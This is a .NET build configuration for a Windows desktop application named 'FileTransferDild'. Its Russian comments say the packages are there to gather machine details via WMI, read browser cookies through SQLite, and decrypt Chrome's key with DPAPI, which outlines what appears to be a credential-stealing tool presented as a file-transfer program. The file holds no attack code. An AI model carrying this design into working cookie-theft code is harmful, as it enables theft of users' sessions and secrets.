<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net8.0-windows</TargetFramework>
    <Nullable>enable</Nullable>
    <ImplicitUsings>enable</ImplicitUsings>
    <UseWPF>true</UseWPF>
    <UseWindowsForms>true</UseWindowsForms>
    <AssemblyName>FileTransferDild</AssemblyName>
    <RootNamespace>FileTransfer</RootNamespace>
    <ApplicationManifest>app.manifest</ApplicationManifest>
  </PropertyGroup>
  <ItemGroup>
    <!-- WMI для получения характеристик компьютера -->
    <PackageReference Include="System.Management" Version="8.0.0" />
    <!-- SQLite для чтения кук браузеров -->
    <PackageReference Include="Microsoft.Data.Sqlite" Version="9.0.3" />
    <!-- DPAPI для расшифровки ключа Chrome -->
    <PackageReference Include="System.Security.Cryptography.ProtectedData" Version="8.0.0" />
  </ItemGroup>
</Project>
